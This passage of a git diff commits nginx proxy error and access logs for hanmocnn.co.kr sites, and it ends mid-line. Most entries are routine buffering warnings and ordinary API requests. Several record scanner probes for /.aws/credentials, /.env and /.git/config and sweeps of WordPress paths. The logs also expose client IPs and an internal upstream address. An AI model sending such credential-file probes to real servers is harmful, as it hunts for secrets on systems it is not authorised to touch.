/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/84/0000019844 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/84/0000019845 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/84/0000019846 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/84/0000019847 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/84/0000019848 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/84/0000019849 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/85/0000019850 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/85/0000019851 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/85/0000019852 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/85/0000019853 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" diff --git a/npm/data/logs/proxy-host-2_access.log b/npm/data/logs/proxy-host-2_access.log index 26b4817..5cef119 100644 --- a/npm/data/logs/proxy-host-2_access.log +++ b/npm/data/logs/proxy-host-2_access.log @@ -628,3 +628,171 @@ [16/Feb/2026:22:29:29 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.aws/credentials" [Client 190.87.168.129] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" [16/Feb/2026:22:29:31 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 216.147.127.93] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" [17/Feb/2026:00:08:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[17/Feb/2026:04:14:55 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Feb/2026:04:14:56 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:04:16:45 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:04:16:45 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:04:16:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:04:16:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:04:17:49 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5976] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:06:05:59 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:06:06:06 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 45.94.31.224] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[17/Feb/2026:09:11:03 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" +[17/Feb/2026:09:11:05 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" +[17/Feb/2026:10:47:28 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[17/Feb/2026:10:47:28 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:10:47:28 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:10:47:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 1856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:10:47:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.232] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:11:31:04 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" "-" +[17/Feb/2026:11:31:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-" +[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:33:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:33:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:34:23 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:13:01:11 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 14383] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:13:36:27 +0000] - 200 200 - POST https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:13:36:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3242] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[17/Feb/2026:18:19:07 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 